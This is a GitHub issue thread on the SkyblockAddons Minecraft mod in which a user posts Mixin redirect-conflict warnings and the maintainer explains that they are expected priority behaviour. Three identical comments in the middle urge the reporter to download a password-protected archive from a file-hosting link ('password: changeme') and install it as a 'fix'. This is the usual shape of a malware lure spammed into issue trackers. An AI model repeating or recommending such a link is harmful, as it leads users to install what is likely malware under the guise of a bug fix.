### ISSUE TITLE
[Bug] Mixin warnings

### ISSUE THREAD

**Issue by TheDGOfficial** [Fix3dll/SkyblockAddons#57]
### Bug Description

```java
[Client thread/WARN]: @Redirect conflict. Skipping mixins.skyhanni.json:renderer.MixinContributorRendererEntityLiving->@Redirect::alwaysMarkAsHavingCape(Lnet/minecraft/entity/player/EntityPlayer;Lnet/minecraft/entity/player/EnumPlayerModelParts;)Z with priority 500, already redirected by mixins.skyblockaddons.json:RendererLivingEntityTransformer->@Redirect::rotateCorpse(Lnet/minecraft/entity/player/EntityPlayer;Lnet/minecraft/entity/player/EnumPlayerModelParts;)Z with priority 1000

[Client thread/WARN]: @Redirect conflict. Skipping mixins.notenoughupdates.json:MixinGuiContainer->@Redirect::drawScreen_drawGradientRect(Lnet/minecraft/client/gui/inventory/GuiContainer;IIIIII)V with priority 500, already redirected by mixins.skyblockaddons.json:GuiContainerTransformer->@Redirect::drawGradientRect(Lnet/minecraft/client/gui/inventory/GuiContainer;IIIIII)V with priority 1000

[Client thread/WARN]: @Redirect conflict. Skipping mixins.skyblockaddons.json:GuiNewChatTransformer->@Redirect::printChatMessageWithOptionalDeletion(Lnet/minecraft/util/IChatComponent;)Ljava/lang/String; with priority 1000, already redirected by mixins.skytils.json:gui.MixinGuiNewChat->@Redirect::printFormattedText(Lnet/minecraft/util/IChatComponent;)Ljava/lang/String; with priority 1001

[Thread-510/WARN]: @ModifyConstant conflict. Skipping mixins.skyhanni.json:MixinFontRenderer->@ModifyConstant::insertZColorCode(Ljava/lang/String;)Ljava/lang/String; with priority 1000, already redirected by mixins.skyblockaddons.json:FontRendererTransformer->@ModifyConstant::insertZColorCode(Ljava/lang/String;)Ljava/lang/String; with priority 1000
```

### SBA Version

Self-built version from master branch removing RenderGlobal transformer to bypass a crash on game launch (seperate issue)

### Operating System

Ubuntu 24.0.1 LTS

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Fix3dll** [comment]
These are the log messages that work as expected. When different modes target the same point, Mixin works according to priority. There is no problem here. If you encounter a problem, open a new issue with more detailed information.
